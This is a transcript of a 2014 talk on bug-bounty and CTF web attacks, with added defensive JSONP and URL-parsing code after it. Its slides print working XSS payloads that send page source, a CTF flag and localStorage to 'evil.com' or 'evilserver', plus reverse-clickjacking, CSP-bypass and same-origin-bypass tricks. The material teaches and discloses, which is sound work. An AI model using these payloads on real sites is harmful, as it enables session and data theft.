
6.2. Hacking most popular websites

611 views


Meeting #6.

Published in: Internet


  1. Tricks to hack most popular websites on the planet. By Pavel Toporkov, Jun 07, 2014
  2. Pavel Toporkov: Positive Technologies, CTF player and organizer, bug hunter
  3. Bug Bounty. Found bugs - got bucks. Bug Bounty programs: • Google • Facebook • PayPal • GitHub • Yandex • Mail.ru
  4. They are not so dumb: • All SQL queries are escaped • All user-controlled output is escaped • External entities are disallowed • and so on...
  5. Good news everyone! We have XSS.
  6. Google bug: Google API Developer
  7. Google API Developer
  8. iframe postMessage
  9. Vuln #1. It's possible to change the iframe location:
     https://developers.google.com/apis-explorer/?base=https://evil.com%23webapis-discovery.appspot.com/_ah/api#
  10. Vuln #2. Insecure tokens:
     token_1 = location.hash.split('rpctoken=')[1];
     token_2 = window.name;
  11. Vuln #3. It's possible to change the documentation link.
  12. Reverse Clickjacking time!
  13. Reverse Clickjacking
     http://domain/search?query=a&callback=draw
     <script> draw({"result":[search_result1, search_result2]}) </script>
  14. Reverse Clickjacking. Attacker can use useful functions:
     document.forms[2].submit
     document.links[4].click
  15. Reverse Clickjacking
     document.body.lastElementChild.previousSibling.lastElementChild.firstElementChild.firstElementChild.lastElementChild.firstElementChild.firstElementChild.firstElementChild.nextSibling.click
  16. Exploit
     token_1 = location.hash.split('rpctoken=')[1];
     token_2 = window.name;
     send_payload(data, token_1, token_2);
     window.setTimeout('document.location=callback_url;', 3000);
  17. Pew Pew
  18. PHD CTF 2014 Quals
  19. DT_VCS #1. JSONP callback spoofing
     /colorer.php?callback=loadCode&code=code&lang=php
     Trying to set the lang value to "&callback=alert"...
  20. DT_VCS #2. XSS via Reverse Clickjacking. Post a link like "javascript:alert('PWN')" and a callback like:
     document.body.firstChild.firstChild.nextSibling.firstChild.nextSibling.firstChild.click
  21. DT_VCS
  22. DT_VCS. Trying to steal the cookie...
     195.133.87.174 - - [27/Jan/2014:14:18:45 +0000] "GET /?phd=PHPSESSID=2ch9tmve1potrd36hhklcg8tv4 HTTP/1.1" 200 647 "http://localhost/contributes.php?id=857" "Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20130619 SlimerJS/0.8.4"
     But PHPSESSID is not the auth cookie. Let's try to get the page source via XSS:
     document.write('<iframe name=ifr src=code.php onload=location.replace("http://evil.com/?phd="+btoa(ifr.document.body.innerHTML))>')
  23. DT_VCS. Page source:
     <form method=POST action=/code.php?deleteall> <img src=/captcha.php> <br> <input name=code> <input type=submit> </form>
  24. CAPTCHA over XSS?
  25. DT_VCS. Seems like PHPSESSID is used for storing the correct CAPTCHA value. So if we set our PHPSESSID cookie in the admin's browser, we know the correct CAPTCHA value.
  26. DT_VCS
     captcha='M6yEnn';
     document.cookie='PHPSESSID=aminqljt6e7senfe9m53ucfoa0';
     b=new XMLHttpRequest();
     b.open('POST','/code.php?deleteall',true);
     b.withCredentials=true;
     b.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
     b.onreadystatechange = function() {
       a=new XMLHttpRequest();
       a.open('GET','http://evil.com/?flag='+b.responseText,true);
       a.send();
     }
     b.send('code='+captcha);
  27. DT_VCS
     195.133.87.174 - - [27/Jan/2014:15:08:46 +0000] "GET /?flag=Good%20work.%20Here%20is%20the%20flag:%20Nic3_Bl1nd_h4ck_x5s_n1Nj4 HTTP/1.1" 200 671 "http://localhost/contributes.php?id=863" "Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20130619 SlimerJS/0.8.4"
  28. Facebook bug
     https://developers.facebook.com/tools/explorer?path={ADDR}
     <script src="http://graph.facebook.com/{ADDR}?callback=func"></script>
     /**/ func({ "id": "10000000000000", "first_name": "Bug", "last_name": "Hunter", });
  29. Solution. /login.php?next=address redirects to address:
     https://developers.facebook.com/tools/explorer?method=GET&path=login.php?next%3dhttps%253a//graph.facebook.com/me%253fcallback%253dalert
  30. How does it work? (diagram: Page, /login.php, Evil Payload, 302 Redirect)
  31. And now we have a problem
  32. Content Security Policy. Seems like we need to find another place for our payload.
  33. Fuck it!
  34. Dat feeling when you love IE
  35. Content Security Policy. Internet Explorer completely ignores the "Content-Security-Policy" header; it requires the "X-Content-Security-Policy" header.
  36. Boooooom!
  37. Video
  38. Chrome tricks
     var origin = location.href.match(/\w+:\/\/[^\/]+/)[0];
     var url = 'http://domain/search2?query=' + encodeURIComponent(params.query) + '&token=' + encodeURIComponent(params.token) + '&key=' + key + '&origin=' + origin;
  39. Chrome tricks. Let's look at the RFC 1738 URL format:
     //<user>:<password>@<host>:<port>/<url-path>
  40. Chrome tricks. And if we try something like that:
     http://i_can_decode_something_like_this_&quot@pwny.in/reflector.php?data=<script>document.write(location)</script>
  41. Chrome tricks. PoC to steal localStorage:
     http://domain&quot-location.replace(decodeURIComponent(&quot%2f%2fevilserver%2f&quot)+JSON.stringify(localStorage))-&quot@domain/s02#query=smthing
  42. Chrome tricks. And now we need to bypass this:
     if (XSS.sanitizeURL(location.href) !== location.href) { location = 'about:blank'; }
     How is it possible?
  43. Chrome tricks. HOLY 0DAYZZZ SOP BYPASS!!!
  44. Chrome tricks. The main idea of the SOP bypass is very simple: just execute history.pushState in the context of another page, like this:
     history.pushState.apply(frames[1].history, ['', '', payloaded_url]); // Fixed now
  45. Chrome tricks
  46. The End. @Paul_Axe http://paul-axe.blogspot.com/ Questions?
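Slides 13-15 and 19-20 rely on a JSONP endpoint that echoes whatever callback name it is given, which is what lets a DOM path such as document.forms[2].submit be served as the "callback". The block below is an added example, not code from the deck or from any of the sites it names: a Node.js-style renderer that accepts only identifier-shaped callback names, serves the body with a JavaScript content type, and prefixes it with the /**/ comment seen on the graph.facebook.com response of slide 28. Function names, the length limit and the sample data are constructed for this example.

```javascript
// Added example (not from the slides): hardening a JSONP response.
// A callback name is accepted only if it is a single JavaScript identifier:
// no dots, brackets, parentheses or quotes, so DOM paths such as
// document.forms[2].submit or document.body.firstChild.click are refused.
const CALLBACK_RE = /^[A-Za-z_$][A-Za-z0-9_$]*$/;
const MAX_CALLBACK_LEN = 64; // constructed limit; real callback names are short

function isSafeCallbackName(name) {
  return typeof name === 'string' &&
    name.length > 0 &&
    name.length <= MAX_CALLBACK_LEN &&
    CALLBACK_RE.test(name);
}

// JSON.stringify output is not quite a JavaScript literal: U+2028/U+2029 are
// legal inside JSON strings but end a line in older JS engines, so escape them.
function toJsLiteral(data) {
  return JSON.stringify(data)
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Builds the HTTP response for a request like /search?query=...&callback=<name>.
// Returns a plain object so the result can be checked without a real server.
function renderJsonp(callbackName, data) {
  if (!isSafeCallbackName(callbackName)) {
    return {
      status: 400,
      headers: {
        'Content-Type': 'text/plain; charset=utf-8',
        'X-Content-Type-Options': 'nosniff',
      },
      body: 'invalid callback name',
    };
  }
  return {
    status: 200,
    headers: {
      // Script content type plus nosniff: the body is never interpreted as HTML.
      'Content-Type': 'application/javascript; charset=utf-8',
      'X-Content-Type-Options': 'nosniff',
    },
    // Leading comment, as on slide 28, so the response can never begin with
    // caller-chosen bytes.
    body: '/**/ ' + callbackName + '(' + toJsLiteral(data) + ');',
  };
}

// Constructed sample payload in the shape of slide 13.
const SAMPLE_RESULT = { result: ['search_result1', 'search_result2'] };

if (typeof module !== 'undefined' && require.main === module) {
  console.log(renderJsonp('draw', SAMPLE_RESULT).body);
  console.log(renderJsonp('document.forms[2].submit', SAMPLE_RESULT).status);
}
```

An identifier check blocks the DOM-path callbacks of slides 14, 15 and 20 but not every misuse (slide 19's "alert" is a legal identifier), so it complements rather than replaces the stronger rule: do not expose per-user data through JSONP at all, and use CORS for cross-origin reads.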
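Slides 38-41 work because the page extracted its origin with a regular expression that swallows the user:password@ part of the authority, and slide 19 works because a query string was assembled by concatenation. The block below is an added example, not code from the deck: the regex of slide 38 written with its escapes, next to the WHATWG URL parser, a check for credentials in the page's own location in the spirit of the slide 42 guard, and a query builder that encodes every parameter. The hostname example.com and the injected text are constructed placeholders.

```javascript
// Added example (not from the slides): extracting a URL's origin correctly.

// The regex from slide 38. It matches scheme://<anything but "/">, so for
// http://user:pass@host/... the userinfo ends up inside the "origin".
const NAIVE_ORIGIN_RE = /\w+:\/\/[^\/]+/;

function naiveOrigin(href) {
  const m = href.match(NAIVE_ORIGIN_RE);
  return m ? m[0] : null;
}

// WHATWG URL parser (a global in Node.js and browsers): username and password
// are separated from the host, and .origin is scheme://host[:port] only.
function safeOrigin(href) {
  return new URL(href).origin;
}

// Detection check in the spirit of slide 42: a page that never expects
// credentials in its own URL can treat their presence as tampering.
function hasUserinfo(href) {
  const u = new URL(href);
  return u.username !== '' || u.password !== '';
}

// Slide 19 works because "php&callback=alert" was concatenated into the query
// string. URLSearchParams encodes '&' and '=' inside each value, so the injected
// text stays inside the lang parameter and no second callback appears.
function buildSearchUrl(base, params) {
  const u = new URL(base);
  for (const [key, value] of Object.entries(params)) {
    u.searchParams.set(key, value);
  }
  return u.toString();
}

// Constructed inputs: a URL in the shape of slide 41, with harmless text where
// the slide had JavaScript, and the parameter-injection attempt of slide 19.
const CONSTRUCTED_HREF = 'http://example.com"-INJECTED-"@example.com/s02#query=smthing';
const INJECTED_PARAMS = { callback: 'loadCode', code: 'code', lang: 'php&callback=alert' };

if (typeof module !== 'undefined' && require.main === module) {
  console.log('naive origin :', naiveOrigin(CONSTRUCTED_HREF));
  console.log('parsed origin:', safeOrigin(CONSTRUCTED_HREF));
  console.log('userinfo present:', hasUserinfo(CONSTRUCTED_HREF));
  console.log(buildSearchUrl('https://example.com/colorer.php', INJECTED_PARAMS));
}
```

The naive match returns the whole authority including the quoted payload, which is then reflected into the next request; the parsed origin is just http://example.com.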
